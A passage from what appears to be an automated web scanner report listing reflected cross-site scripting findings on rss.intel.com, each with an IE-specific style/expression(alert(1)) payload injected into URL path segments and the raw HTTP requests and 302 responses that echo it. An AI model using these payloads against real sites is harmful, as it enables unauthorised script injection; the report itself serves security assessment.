This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog6e1b4"style%3d"x%3aexpression(alert(1))"65332bacd22/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:18 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog6e1b4"style="x:expression(alert(1))"65332bacd22/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171
Content-Length: 234
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog6e1b4"style="x:expression(alert(1))"65332bacd22/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171">
...[SNIP]...

4.50. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 7]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69bd1"style%3d"x%3aexpression(alert(1))"bfde37c43e was submitted in the REST URL parameter 7. This input was echoed as 69bd1"style="x:expression(alert(1))"bfde37c43e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/201169bd1"style%3d"x%3aexpression(alert(1))"bfde37c43e/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:23 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/201169bd1"style="x:expression(alert(1))"bfde37c43e/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171
Content-Length: 233
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/201169bd1"style="x:expression(alert(1))"bfde37c43e/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171">
...[SNIP]...

4.51. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 8]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e21a"style%3d"x%3aexpression(alert(1))"7ce44f0bd7d was submitted in the REST URL parameter 8. This input was echoed as 2e21a"style="x:expression(alert(1))"7ce44f0bd7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/022e21a"style%3d"x%3aexpression(alert(1))"7ce44f0bd7d/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:28 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/022e21a"style="x:expression(alert(1))"7ce44f0bd7d/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171
Content-Length: 234
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/022e21a"style="x:expression(alert(1))"7ce44f0bd7d/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171">
...[SNIP]...

4.52. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 9]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f5e1"style%3d"x%3aexpression(alert(1))"2081e06e0bf was submitted in the REST URL parameter 9. This input was echoed as 9f5e1"style="x:expression(alert(1))"2081e06e0bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/029f5e1"style%3d"x%3aexpression(alert(1))"2081e06e0bf/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:33 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/029f5e1"style="x:expression(alert(1))"2081e06e0bf/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171
Content-Length: 234
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/029f5e1"style="x:expression(alert(1))"2081e06e0bf/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171">
...[SNIP]...

4.53. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 10]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2087"style%3d"x%3aexpression(alert(1))"9f34ca0a49 was submitted in the REST URL parameter 10. This input was echoed as a2087"style="x:expression(alert(1))"9f34ca0a49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-upa2087"style%3d"x%3aexpression(alert(1))"9f34ca0a49 HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:37 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-upa2087"style="x:expression(alert(1))"9f34ca0a49?cid=rss-182178-c1-264172
Content-Length: 218
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-upa2087"style="x:expression(alert(1))"9f34ca0a49?cid=rss-182178-c1-264172">
...[SNIP]...

4.54. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 2]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8099"style%3d"x%3aexpression(alert(1))"7fdc79223e8 was submitted in the REST URL parameter 2. This input was echoed as b8099"style="x:expression(alert(1))"7fdc79223e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264172b8099"style%3d"x%3aexpression(alert(1))"7fdc79223e8/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:21:59 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172b8099"style="x:expression(alert(1))"7fdc79223e8
Content-Length: 219
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172b8099"style="x:expression(alert(1))"7fdc79223e8">
...[SNIP]...

4.55. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 3]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0ea1"style%3d"x%3aexpression(alert(1))"2d8c663cb48 was submitted in the REST URL parameter 3. This input was echoed as a0ea1"style="x:expression(alert(1))"2d8c663cb48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264172/newsroom.intel.coma0ea1"style%3d"x%3aexpression(alert(1))"2d8c663cb48/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:04 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.coma0ea1"style="x:expression(alert(1))"2d8c663cb48/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up
Content-Length: 194
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.coma0ea1"style="x:expression(alert(1))"2d8c663cb48/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up">here</a>

4.56. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 4]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37f9d"style%3d"x%3aexpression(alert(1))"5528cd11f2e was submitted in the REST URL parameter 4. This input was echoed as 37f9d"style="x:expression(alert(1))"5528cd11f2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264172/newsroom.intel.com/community37f9d"style%3d"x%3aexpression(alert(1))"5528cd11f2e/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:09 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community37f9d"style="x:expression(alert(1))"5528cd11f2e/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172
Content-Length: 219
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community37f9d"style="x:expression(alert(1))"5528cd11f2e/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172">
...[SNIP]...

4.57. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 5]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c273f"style%3d"x%3aexpression(alert(1))"5a8a63b8829 was submitted in the REST URL parameter 5. This input was echoed as c273f"style="x:expression(alert(1))"5a8a63b8829 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroomc273f"style%3d"x%3aexpression(alert(1))"5a8a63b8829/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:14 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroomc273f"style="x:expression(alert(1))"5a8a63b8829/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172
Content-Length: 219
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomc273f"style="x:expression(alert(1))"5a8a63b8829/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172">
...[SNIP]...

4.58. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 6]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 975bc"style%3d"x%3aexpression(alert(1))"2eca44a5c06 was submitted in the REST URL parameter 6. This input was echoed as 975bc"style="x:expression(alert(1))"2eca44a5c06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog975bc"style%3d"x%3aexpression(alert(1))"2eca44a5c06/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:18 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog975bc"style="x:expression(alert(1))"2eca44a5c06/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172
Content-Length: 219
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog975bc"style="x:expression(alert(1))"2eca44a5c06/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172">
...[SNIP]...

4.59. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 7]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45d4d"style%3d"x%3aexpression(alert(1))"ddfc2782d6d was submitted in the REST URL parameter 7. This input was echoed as 45d4d"style="x:expression(alert(1))"ddfc2782d6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/201145d4d"style%3d"x%3aexpression(alert(1))"ddfc2782d6d/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:23 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/201145d4d"style="x:expression(alert(1))"ddfc2782d6d/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172
Content-Length: 219
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/201145d4d"style="x:expression(alert(1))"ddfc2782d6d/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172">
...[SNIP]...

4.60. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 8]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68d4a"style%3d"x%3aexpression(alert(1))"41c87971c29 was submitted in the REST URL parameter 8. This input was echoed as 68d4a"style="x:expression(alert(1))"41c87971c29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/0268d4a"style%3d"x%3aexpression(alert(1))"41c87971c29/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:27 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/0268d4a"style="x:expression(alert(1))"41c87971c29/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172
Content-Length: 219
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/0268d4a"style="x:expression(alert(1))"41c87971c29/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172">
...[SNIP]...

4.61. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 9]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deb50"style%3d"x%3aexpression(alert(1))"8f86c2e6e9d was submitted in the REST URL parameter 9. This input was echoed as deb50"style="x:expression(alert(1))"8f86c2e6e9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01deb50"style%3d"x%3aexpression(alert(1))"8f86c2e6e9d/chip-shot-intel-renewable-energy-powers-up HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:33 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01deb50"style="x:expression(alert(1))"8f86c2e6e9d/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172
Content-Length: 219
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01deb50"style="x:expression(alert(1))"8f86c2e6e9d/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172">
...[SNIP]...

4.62. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 10]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8990d"style%3d"x%3aexpression(alert(1))"6a4a1f59ddf was submitted in the REST URL parameter 10. This input was echoed as 8990d"style="x:expression(alert(1))"6a4a1f59ddf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign8990d"style%3d"x%3aexpression(alert(1))"6a4a1f59ddf HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:42 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign8990d"style="x:expression(alert(1))"6a4a1f59ddf?cid=rss-258152-c1-264090
Content-Length: 263
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign8990d"style="x:expression(alert(1))"6a4a1f59ddf?cid=rss-258152-c1-264090">
...[SNIP]...

